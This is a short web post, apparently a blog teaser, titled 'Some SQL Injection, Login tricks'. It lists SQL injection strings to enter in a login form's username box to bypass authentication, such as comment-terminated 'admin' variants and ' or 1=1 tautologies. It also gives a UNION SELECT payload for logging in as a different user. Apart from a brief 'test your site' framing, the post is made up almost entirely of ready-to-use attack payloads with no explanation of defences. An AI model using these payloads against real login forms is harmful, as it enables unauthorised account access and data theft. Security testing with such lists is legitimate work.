Some SQL Injection, Login tricks
place that into the username login box and test your site:
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
....
Login as different user (SM*)
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
- Read more about Some SQL Injection, Login tricks
- Log in to post comments